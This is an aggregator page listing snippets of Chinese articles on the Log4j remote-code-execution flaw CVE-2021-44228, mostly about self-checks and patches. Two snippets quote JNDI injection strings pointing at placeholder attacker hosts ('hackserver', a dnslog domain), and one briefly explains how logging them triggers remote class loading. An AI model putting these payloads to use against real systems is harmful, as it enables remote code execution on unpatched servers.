ICode9

精准搜索请尝试: 精确搜索
  • CVE-2021-44228:Apache Log4j RCE2021-12-18 13:30:14

    文章前言 本篇文章我们主要介绍关于CVE-2021-44228:Apache Log4j RCE漏洞的自检与修复,帮助甲方人员尽快修复项目中存在的不安全依赖 漏洞概述 Apache Log4j2是⼀个基于Java的⽇志记录⼯具,该⼯具重写了Log4j框架,并且引⼊了⼤量丰富的特性,该⽇志框架被⼤量⽤于业务系统开发,⽤来记

  • 快速复现利用Log4j漏洞启动windows计算器2021-12-17 22:31:28

    了解关于漏洞的描述,可以参考Vulnerability Affecting Multiple Log4j Versions Permits RCE Exploit 根据文章描述,首先下载JDK1.8u102,不能高于这个版本。 通过如下pom.xml建立一个maven项目 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/

  • MyBatis-日志工厂2021-12-17 20:03:26

    log4j

  • log4j2漏洞升级2021-12-17 17:30:12

    一、影响范围: Apache Log4j 2.x <= 2.15.0-rc1 二、可能受影响的应用不限于以下内容: Spring-Boot-strater-log4j2 Apache Struts2 Apache Solr Apache Druid Apache Flink ElasticSearch Flume Dubbo Jedis Logstash Kafka Apache Storm 三、解决办法: 1、等待官方升级 log4j2 版

  • Java日志框架学习笔记2021-12-17 16:02:56

    Java日志框架 0 主流Java日志框架 主流的Java日志框架: ​ 1.JUL —不能分天,分文件,被支持淘汰 ​ 2.log4j —老牌主流的日志框架 ​ 日志门面框架 3.JCL —仅支持JUL和log4j,被支持淘汰 4.slf4j —市场上比较主流的日志框架 5.logback —sp

  • Java日志框架学习笔记2021-12-17 15:59:29

    Java日志框架 0 主流Java日志框架 主流的Java日志框架: ​ 1.JUL —不能分天,分文件,被支持淘汰 ​ 2.log4j —老牌主流的日志框架 ​ 日志门面框架 3.JCL —仅支持JUL和log4j,被支持淘汰 4.slf4j —市场上比较主流的日志框架 5.logback —sp

  • Elasticsearch Log4j漏洞快速修复步骤2021-12-17 13:01:27

    Elasticsearch Log4j漏洞快速修复步骤 原创2021-12-14 21:27·walkingcloud 一、Elasticsearch关于Log4j2漏洞的官方说明 可以参考如下链接 https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476   摘要:2

  • 今日还是热点 | Apache Log4j 高危漏洞2021-12-17 10:32:09

    01. 概要 Apache Log4j2 存在一处远程代码执行漏洞,该漏洞影响范围极广,漏洞危害极大。估计昨天所有的 Java 工程师都在熬夜修改这个漏洞。 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发

  • Apache Log4j2 核弹级漏洞2021-12-16 23:05:09

    近日,Apache Log4j2 的远程代码执行漏洞刷爆朋友圈,该漏洞一旦被攻击者利用会造成严重危害。而且此次漏洞影响巨大,很多网站如百度等都是此次 Log4j 远程代码执行漏洞的受害者,很多互联网企业也都连夜做了应急措施。 漏洞详情: Apache Log4j 远程代码执行漏洞  严重程度: 严重 由于A

  • Log4j 爆“核弹级”漏洞,除非你付钱给我,否则为何我要编写有用的软件?2021-12-16 09:59:06

    “开源”崩了! 或者换句话说,除非你付钱给我,否则为何我要编写有用的软件? 近日 Java 生态系统一个至关重要的软件包 log4j2 曝出了一个严重的安全漏洞,对整个互联网构成了严重的威胁。一旦完全沦为了武器,该漏洞让攻击者就可以胁迫 Java 服务器执行从 LDAP(轻型目录访问协议)服务器

  • log4j-CVE-2021-442282021-12-15 16:02:05

  • Java日志框架SLF4J和log4j以及logback的联系和区别2021-12-15 14:34:40

    1.SLF4J(Simple logging Facade for Java) 意思为简单日志门面,它是把不同的日志系统的实现进行了具体的抽象化,只提供了统一的日志使用接口,使用时只需要按照其提供的接口方法进行调用即可,由于它只是一个接口,并不是一个具体的可以直接单独使用的日志框架,所以最终日志的格式、记录

  • log4j-rce复现2021-12-15 12:33:44

    声明:没研究过Java漏洞,有错误的地方一定要告诉我!!原理我也没有继续跟。 01 分析 师傅带着理了一遍,思路清晰了。 一句话总结就是:让引用了log4j的漏洞类,然后把${jndi:ldap://hackserver/xxxxxx}当作参数传到log4j的log.error ,就会通过动态的远程加载我们精心构造的一个恶意类,恶意类编

  • Apache Log4j 远程代码执行漏洞(CVE-2021-44228)漏洞复现2021-12-14 22:05:31

    漏洞描述 Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Ap

  • Apache Log4j 远程代码执行漏洞源码级分析2021-12-14 19:00:47

    漏洞的前因后果 漏洞描述 漏洞评级 影响版本 安全建议 本地复现漏洞 本地打印 JVM 基础信息 本地获取服务器的打印信息 log4j 漏洞源码分析 扩展:JNDI 危害是什么? GitHub 项目 参考链接 漏洞的前因后果 2021 年 12 月 9 日,2021 年 11 月 24 日,阿里云安全团队向 Apache 官方

  • 浅谈Log4j和Log4j2的区别2021-12-14 17:32:17

    浅谈Log4j和Log4j2的区别     相信很多程序猿朋友对log4j都很熟悉,log4j可以说是陪伴了绝大多数的朋友开启的编程。我不知道log4j之前是用什么,至少在我的生涯中,是log4j带我开启的日志时代。 log4j是Apache的一个开源项目,我们不去考究它的起源时间,但是据我了解,log4j 1已经不再更新

  • 使用云效Codeup10分钟紧急修复Apache Log4j2漏洞2021-12-14 14:34:33

    ​简介:2021年12月10日,国家信息安全漏洞共享平台(CNVD)收录了Apache Log4j2远程代码执行漏洞(CNVD-2021-95914),此漏洞是一个基于Java的日志记录工具,为Log4j的升级。作为目前最优秀的Java日志框架之一,被大量用于业务系统开发。 漏洞信息 漏洞编号 CNVD-2021-95914 漏洞等级

  • 【Apache Log4j 漏洞说明】2021-12-14 13:59:40

    Apache Log4j 漏洞说明 Apache Log4j 2影响范围漏洞描述缓解措施 Apache Log4j 2 近日,安恒信息应急响应中心监测到 Apache Log4j 2 存在远程代码执行漏洞, 经验证,该漏洞允许攻击者在目标服务器上执行任意代码,可导致服务器被黑客控制。 由于 Apache Log4j 2 应用较为广泛,

  • ELK 7.6.2 修补log4j漏洞2021-12-14 13:33:15

    1. elasticsearch7.6.2 修补log4j漏洞 找到安装配置目录:/usr/local/elasticsearch-7.6.2/config的 jvm.options文件 添加 -Dlog4j2.formatMsgNoLookups=true 并重新启动集群的每个节点。 2. logstash7.6.2 修补log4j漏洞 cd /usr/share/logstash/logstash-core/lib/jars 备

  • 本地jar手动引入本地仓库(解决pom文件依赖报错)2021-12-13 17:33:22

    最近log4j-2 bug事件导致我们需要自查项目并将自己开发项目中使用大于2.0版本的log4j修改使其解决这个bug,由于目前maven仓库没有无漏洞的pom依赖只能手动将jar引入本地仓,故此记录一下操作。   Maven 安装 JAR 包的命令是: mvn install:install-file -Dfile=jar包的位置 -Dgroup

  • spring boot极速修复log4j漏洞2021-12-13 17:30:15

    周末的log4j漏洞像一个炸弹扔进了粪坑一样,把各种码畜炸的七零八落,一身臭味。漏洞原因想必大家都已经知道了,我的项目使用spring boot也不幸中招。 出现了2个带log4j名称的引用,即使我没有用过log4j,这是spring boot start logging自己引用的,根据我查询的资料,只是一个适配层的转换,

  • Log4j 漏洞修复检测 附检测工具2021-12-13 13:03:54

    作者:SRE运维博客 博客地址:https://www.cnsre.cn/ 文章地址:https://www.cnsre.cn/posts/211213210004/ 相关话题:https://www.cnsre.cn/tags/Log4j/ 近日的Log4j2,可是非常的火啊,我也是加班加点把补丁给打上了次安心。Apache Log4j2存在远程代码执行漏洞,经验证,该漏洞允许攻击者在

  • log4j漏洞产生方法和预防2021-12-13 11:58:54

    产生方法 https://0xsapra.github.io/website/CVE-2019-17571 核心部分${jndi:ldap://xxxxx.dnslog.cn/exp} 想办法把用户输入的可执行字符串送到这个位置就行了,日志里经常打印请求参数之类用户输入的内容,比如"参数a:<请求的输入 攻击伪代码示例: import org.apache.log4j.Lo

  • 安全刻不容缓「GitHub 热点速览 v.21.50」2021-12-13 09:02:26

    作者:HelloGitHub-小鱼干 本周最热的事件莫过于 Log4j 漏洞,攻击者仅需向目标输入一段代码,不需要用户执行任何多余操作即可触发该漏洞,使攻击者可以远程控制用户受害者服务器,90% 以上基于 java 开发的应用平台都会受到影响。通过本文特推项目 2 你也能近距离感受这个漏洞的“魅力”,

  • JAVA日志发展史2021-12-12 22:02:57

    JAVA日志发展史 第一阶段 2001年以前,Java是没有日志库的,打印日志全凭System.out和System.err 缺点: 产生大量的IO操作同时在生产环境中无法合理的控制是否需要输出 输出的内容不能保存到文件 只打印在控制台,打印完就过去了,也就是说除非你一直盯着程序跑 无法定制化,且日志粒度不够

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有